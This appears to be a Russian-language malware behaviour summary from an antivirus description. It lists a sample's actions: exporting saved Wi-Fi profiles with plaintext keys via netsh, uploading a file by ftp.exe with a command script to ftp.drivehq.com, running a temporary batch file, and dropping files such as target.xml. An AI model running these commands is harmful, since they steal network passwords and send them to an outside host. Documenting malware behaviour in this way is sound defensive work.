Техническая информация
- '<SYSTEM32>\ftp.exe' -n -s:ftpcmd.dat ftp.drivehq.com
- '<SYSTEM32>\netsh.exe' wlan export profile key=clear
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\2.bat" <Полный путь к вирусу>"
- <Полный путь к вирусу>.txt
- <Текущая директория>\ftpcmd.dat
- %TEMP%\1.tmp\2.bat
- <Текущая директория>\513_1_wandtattoo_willkommen_sprachen.gif
- <Текущая директория>\513_1_wandtattoo_willkommen_sprachen.gif
- %TEMP%\1.tmp\2.bat
- <Текущая директория>\ftpcmd.dat
- <Текущая директория>\target.xml
- <Полный путь к вирусу>.txt в <Текущая директория>\target.xml
- 'localhost':1041
- 'ft#.#rivehq.com':21
- DNS ASK ft#.#rivehq.com